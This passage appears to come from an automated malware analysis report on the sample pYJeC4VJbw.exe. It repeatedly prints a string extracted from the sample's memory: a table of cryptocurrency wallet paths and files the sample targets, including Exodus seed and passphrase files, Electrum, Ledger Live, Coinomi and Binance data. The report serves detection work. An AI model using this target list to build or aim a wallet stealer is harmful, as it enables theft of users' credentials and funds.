Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
